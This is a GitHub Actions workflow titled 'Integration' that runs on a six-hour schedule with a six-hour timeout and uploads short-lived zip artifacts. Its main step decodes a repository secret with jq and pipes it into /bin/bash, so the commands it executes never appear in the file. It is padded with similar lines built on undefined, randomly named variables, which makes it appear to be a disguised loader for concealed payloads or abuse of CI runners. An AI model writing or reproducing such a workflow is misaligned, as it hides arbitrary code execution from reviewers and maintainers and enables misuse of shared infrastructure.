name: Integration
on:
  workflow_dispatch:

  schedule:
    - cron: '19 3,9,15,21 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  main:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Process
        env:
          sx5: ${{ secrets.sx5 }}
        run: |
          printf '%s' "$sx5" | jq -r .xupk1100 | /bin/bash
          echo $hm765 | jq -r .r6457 | /bin/bash
          echo $gxgki60 | jq -r .j507 | /bin/bash
          echo $yd7 | jq -r .d233 | /bin/bash
          echo $ngeui8901 | jq -r .rmru11 | /bin/bash
          printf '%s' "$uwy6" | jq -r .jnn77351 | /bin/bash
          echo $mchk00071 | jq -r .u7 | /bin/bash

      - name: Archive output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: GHGrbQPx
          path: "*.zip"
          retention-days: 1
